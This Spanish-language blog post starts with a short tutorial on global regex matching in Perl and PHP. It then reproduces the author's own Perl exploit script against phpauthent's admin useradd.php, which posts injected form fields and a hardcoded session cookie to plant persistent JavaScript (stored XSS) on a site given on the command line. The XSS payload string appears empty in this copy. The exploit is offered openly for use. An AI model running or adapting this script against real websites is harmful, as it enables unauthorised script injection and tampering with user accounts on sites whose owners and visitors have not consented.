Buenas, aveces necesitamos hacer una captura global con expresiones regulares, ya que cuando encuentra el primer patron hay termina la expresion termina...

Aunque en Perl nunca tuve ese problema en PHP, así que muestro la manera de hacerlo con PHP y Perl.

Perl

En Perl necesito usar el operador de opción g mas una sentencia infinita, en este caso while...

#!/usr/bin/perl -w

$txt = "Hola adios Hola aqwq ds iifndini Hola";

while($txt =~ m/(Hola+)/g){

print $1, "\n";

}

exit;

yoya@yoya-desktop:~/Escritorio$ perl d.pl
Hola
Hola
Hola

<?php

$txt = "Hola adios Hola aqwq ds iifndini Hola";
preg_match_all("/(Hola+)/", $txt, $captura, PREG_SET_ORDER);
foreach ($captura as $salida){
echo $salida[1];
echo "\n";
}


?>

yoya@yoya-desktop:~/Escritorio$ php  a.php
Hola
Hola
Hola

Bueno hace poco publique un exploit en security focus, para insetar un código javascript permanente...

#!/usr/bin/perl
#Autor: Yoyahack
#Web: http://undersecurity.net
#Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....

use LWP::UserAgent;
use HTTP::Request::Common;

#Source

print q(---------------------------------
Autor: Yoyahack
Web: http://undersecurity.net
Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....
---------------------------------
);

if(!$ARGV[0]){
print "Insert web\n";
print "Ex: www.webpage.comhttp://www.webpage.com\n";
exit;
}

$xss = qq();
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.2pre)".
"Gecko/20100308 Ubuntu/9.10 (karmic) Namoroka/3.6.2pre");

$response = $ua->request(
POST "http://$ARGV[0]/phpauthent/phpauthentadmin/useradd.php?action=create",
{
action => 'changerealname',
name => $xss,
action => 'rename',
login => 'aaa',
action=> 'password',
password => 'XSS',
action => 'changeemail',
email => 'XSS',
},
'Cookie' => 'PHPSESSID=cf1c170aa9d334d6cec1514e721573e6',
);
$loc = 'index.php?msg=001';
if($loc eq $response->header('location')){
print "\n\nExploit send!\n";
exit;
}
print "\n\nExploit Faield\n";